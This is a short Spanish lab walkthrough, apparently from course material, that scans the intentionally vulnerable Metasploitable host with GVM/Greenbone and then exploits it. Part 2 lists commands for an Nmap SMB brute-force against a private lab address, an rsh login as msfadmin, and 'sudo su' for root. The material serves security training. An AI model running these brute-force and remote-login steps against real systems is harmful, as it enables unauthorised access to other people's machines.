Escanear host gvm

Parte 1: Escanear un host en busca de vulnerabilidades

  1. Iniciar servicios GVM:

    bashCopy codesudo gvm-start
  2. Acceder a Greenbone Security Assistant:

  3. Escaneo del host Metasploitable:

    • Navegar a Escaneos -> Tareas -> Asistente de tareas avanzadas.

    • Ingresar detalles y crear tarea para escanear Metasploitable.

  4. Ver informes y resultados:

    • Esperar hasta que la tarea esté completa.

    • Acceder al informe y la pestaña Resultados.

  5. Interpretar resultados del escaneo:

    • Hacer clic en la vulnerabilidad "El servicio rexec se está ejecutando" en la pestaña Resultados.

Parte 2: Explotar una vulnerabilidad encontrada por GVM

  1. Descubrir nombres de usuario y contraseñas con Nmap:

    sudo nmap -sV -p 445 -script smb-brute 172.17.0.2
  2. Instalar cliente de shell remoto (RSH):

    sudo apt-get install rsh-client
  3. Iniciar sesión en Metasploitable usando RSH:

    rsh -l msfadmin 172.17.0.2
  4. Obtener acceso raíz:

    sudo su

Última actualización